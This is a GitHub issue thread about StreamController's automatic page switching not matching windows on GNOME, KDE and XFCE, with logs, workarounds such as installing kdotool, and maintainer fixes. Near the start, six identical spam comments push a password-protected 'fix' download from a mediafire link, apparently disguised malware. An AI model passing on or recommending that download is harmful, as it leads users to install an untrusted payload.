### ISSUE TITLE
BUG: Can't seem to get automatic page switching working.

### ISSUE THREAD

**Issue by snek-the-great** [StreamController/StreamController#215]
**Describe the bug**
I can't seem to get automatic page switching working. I'm using Title/Class regexes from looking glass, but it isn't able to find any matching windows even though the regexes are the same. The GNOME Shell Extension is installed/up to date (version 2), as is the flatpak package (1.5.0-beta.6).

**To Reproduce**
1. Go to the automatic page switching settings
2. Use 'Mozilla Firefox' for a title regex and 'firefox' for WM class.
3. Scroll down to Confirm those
4. hit reload to check matching windows
5. window does not show up

**Expected behavior**
my firefox window shows up in the matching windows

**Screenshots**
![image](https://github.com/user-attachments/assets/0335076b-f46b-4c02-ac09-b11b51be775c)

**Additional context**
![image](https://github.com/user-attachments/assets/3a963b90-997e-4800-9248-fdda7a01c801)
![image](https://github.com/user-attachments/assets/2932fab9-7512-48de-b099-d7e556f7faf7)

This could totally be an issue of me not knowing how to do this right, so anything helps here.
Thanks!
-Snek

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by G4PLS** [comment]
I think firefox, or any browser for that is using the current website as the Window "Title"

**Comment by Core447** [comment]
> I think firefox, or any browser for that is using the current website as the Window "Title"

Yes. It should be fixed with 8a0d23a0829b149e5402648f521bfa48fbd9e9cc which will be available with the next app update.

**Comment by snek-the-great** [comment]
Sweet! I'll close this when that rolls out.

Edit: Just tried this with Audacity. It doesn't appear to recognize that either.

![image](https://github.com/user-attachments/assets/e8beeae7-3c3f-4e83-912f-64259c75c280)

**Comment by snek-the-great** [comment]
@Core447 I think I may have found my problem. ran `journalctl | grep "core447"` and it came back with ~~dozens if not hundreds~~ tens of thousands of these: `Sep 02 19:11:56 MobileCommand com.core447.StreamController.desktop[5126]: 2024-09-02 19:11:56.255 | WARNING  | MediaController:get_matching_ifaces:57 - org.freedesktop.DBus.Error.AccessDenied: An AppArmor policy prevents this sender from sending this message to this recipient; type="method_call", sender=":1.120" (uid=1000 pid=5066 comm="xdg-dbus-proxy --args=42" label="flatpak (unconfined)") interface="org.freedesktop.DBus.Properties" member="Get" error name="(unset)" requested_reply="0" destination=":1.257" (uid=1000 pid=248409 comm="/snap/firefox/4793/usr/lib/firefox/firefox" label="snap.firefox.firefox (enforce)")`. What this seems to say is that an AppArmor profile is preventing StreamController from reading the window regexes. Maybe this helps. ~~I've attached the full output of that `journalctl` command.~~ Nevermind. The full output is 33MB of mostly just that error. I've instead opted for screenshots in vscode showing how many there are. 
If you'd like the full log, I can send it to you via the Proton address in your bio.
![Screenshot from 2024-09-02 19-33-05](https://github.com/user-attachments/assets/3ad8d366-15ea-4984-bf38-85687af93a8b)
![image](https://github.com/user-attachments/assets/e446aada-3add-4c5a-90ab-bf97acb5cb43)

Hope this helps!
-Snek

**Comment by Core447** [comment]
@snek-the-great This error comes from the media plugin and therefore shouldn't affect the window switching. However, I ofc need to fix this spamming. 

Regarding Audacity, I will check if the mentioned commit fixes that as well.

**Comment by Core447** [comment]
> Regarding Audacity, I will check if the mentioned commit fixes that as well.

Can confirm that this is now fixed as well.

Maybe consider creating a new issue on the [media plugin](https://github.com/StreamController/MediaPlugin/) repo for the journal spamming issue.

**Comment by teras** [comment]
I have built the app through the flatpak script to try the latest version, since this doesn't work for me either.

Attached is my configuration which still doesn't work. In the syslog I don't see any message about window or anything else. Maybe I should tick some king of property somewhere else? Unfortunately I didn't find any. Also I put as a window title `.*` just in case. Also Matching windows doesn't bring any results.

Here's the screenshot:

![Screenshot From 2024-09-29 02-17-18](https://github.com/user-attachments/assets/1aa8f943-4e76-4c5a-8855-b0622a73612a)

**Comment by Core447** [comment]
@teras 
It says "0 selected" - you'll have to select at least one deck that should switch to this page. Atm there's a bug that causes the setting to reset after the first time or so, so you might have to select it a 2nd time.

**Comment by teras** [comment]
Thank you @Core447 for your response. With all respect I don't think this is the reason, since on all other configurations, I didn't have to explicitly select this board, and this translated to "any deck". 

Indeed, selecting the deck explicitly didn't help , same behavior.

![image](https://github.com/user-attachments/assets/5633532a-2e17-408a-8f4c-b29eb08f310a)

**Comment by teras** [comment]
I changed from Gnome to KDE and it seems that changing pages based on active application partially works. From what I found, in KDE, when I change focus to an application that is defined, then indeed the page changes. If the focus goes to any other random application, then it stays the same. 

To summarize:

1) In Gnome X11 the change page feature does not work
2) In KDE, the feature works only one way: when it matches indeed goes to this page, but it is expected when it doesn't match, to fallback to the default page, which it doesn't.

**Comment by letroll** [comment]
@snek-the-great  You need also to select a deck

**Comment by greenseeker** [comment]
I'm seeing the same issue on Ubuntu 24.04. Even `.*` doesn't match any windows, so I don't see any way this could work.

**Comment by Core447** [comment]
> I'm seeing the same issue on Ubuntu 24.04. Even `.*` doesn't match any windows, so I don't see any way this could work.

Have you installed [the Gnome extension](https://extensions.gnome.org/extension/6871/streamcontroller-integration/)?

**Comment by greenseeker** [comment]
> > I'm seeing the same issue on Ubuntu 24.04. Even `.*` doesn't match any windows, so I don't see any way this could work.
> 
> Have you installed [the Gnome extension](https://extensions.gnome.org/extension/6871/streamcontroller-integration/)?

Yes, it's installed, activated, and has nothing obvious wrong with it. Any way I can troubleshoot that?

**Comment by JannikWilhelm** [comment]
+1, Fedora 42 Gnome, Gnome Extension is installed, but when starting the app from terminal to see logs, nothing appears to happen when changing windows. Also the exact same configuration works in KDE (same page, window class regex, using copied data folder), when kdotool is installed. So I assume somewhere in the gnome-specific stack?

**Comment by boldandbusted** [comment]
I'm also having this trouble with page switching not working, even though I have a matching regexp. However, I'm using XFCE, not GNOME or KDE, so perhaps there's something else at work in my setup.

**Comment by besb1n** [comment]
auto switching is not working on lmde. i see the correct matching window show up. it just doesnt switch.

**Comment by Core447** [comment]
> So I assume somewhere in the gnome-specific stack?

Will check.

> However, I'm using XFCE,

using Wayland? Unfortunately, XFCE is only supported on X11.

**Comment by Core447** [comment]
> +1, Fedora 42 Gnome, Gnome Extension is installed, but when starting the app from terminal to see logs, nothing appears to happen when changing windows. Also the exact same configuration works in KDE (same page, window class regex, using copied data folder), when kdotool is installed. So I assume somewhere in the gnome-specific stack?

On my machine the auto page switching works on Gnome. But I guess it's not super intuitive. You have to make sure that your deck is selected. Also if the regex entries show the blue circle with the checkmark (marked in red) you have to click it for it so save.

<img width="1316" height="811" alt="Image" src="https://github.com/user-attachments/assets/248c7846-5dca-45e9-acfa-2531682d7436" />

**Comment by kyriog** [comment]
Here are my infos about this issue on my end.
Using CachyOS w/ KDE desktop, `streamcontroller-git` AUR package (version r1856.0967bb2a-1).

The feature wasn't working at all on my end. Even entering `.*` both as Title Regex and WM Class Regex never trigger any page switch. I did selected my stream deck in the list. Also, nothing was found in the Matching Windows section.

I then started StreamController from terminal to get access to logs.
And when I tried using the "Refresh" icon on Matching Windows section, I got this log:
```
2026-04-17 02:11:42.105 | ERROR    | src.backend.WindowGrabber.Integrations.KDE:_run_command:61 - An error occurred while running ['kdotool', 'search', '.']: [Errno 2] Aucun fichier ou dossier de ce nom: 'kdotool'
```
Sorry for the french error at the end, it basically says that `kdotool` cannot be found.

I simply installed `kdotool-bin` from AUR – I guess `kdotool` should also work – then restarted StreamController.

This time, no more error when refreshing the list, and even better, it now displays windows, and I've been able to configure it the way I want.

Tip 1: Using general regex allows you to see what StreamController grabs using the list, and adjust your regexes more easily.

Tip 2: The "Stay on page" works on my end the other way around. If the toggle is on, when I loose focus, it stays on the same page. If the toggle is off, the page is rollbacked to default one when I loose focus (hope it may help if you're still having your issue after more than a year @teras)

**Comment by greenseeker** [comment]
> On my machine the auto page switching works on Gnome. But I guess it's not super intuitive. You have to make sure that your deck is selected. Also if the regex entries show the blue circle with the checkmark (marked in red) you have to click it for it so save.

I can type `.*` in the **Title Regex** field, click the blue checkmark, and then refresh and expand the **Matching Windows** list, and there are none.

How can I verify the Gnome extension is working?

**Comment by Core447** [comment]
Closing this for now. If anyone is still having this issue feel free to comment here again.

**Comment by greenseeker** [comment]
> Closing this for now. If anyone is still having this issue feel free to comment here again.

Made sure I'm on the latest versions of StreamController and the Gnome extension, but nothing has changed. `.*` still matches no windows.

**Comment by Core447** [comment]
For me eb2adec6ce3a6370437ce2d48b3dcdbe984135dd fixed it. Unfortunately, it's not yet available on Flathub, but will be in the next weeks.

**Comment by greenseeker** [comment]
Thanks, I'll set myself a reminder to test again in a month.

**Comment by Core447** [comment]
#601 Is pretty similar and https://github.com/StreamController/StreamController/issues/601#issuecomment-5234488496 commented that eb2adec6ce3a6370437ce2d48b3dcdbe984135dd fixed it. So I assume that it will be fixed with the next release.

**Comment by slovia** [comment]
For me the next release did NOT fix it. I posted to #601 but nobody seems to read that one - or reply to it. I really wish this could be solved... or somebody could explain to me what I must do to fix it. #601 and here sounds like the latest release should simply fix it with no additional action from my side. If I misunderstand, please help me!
Thanks so much!
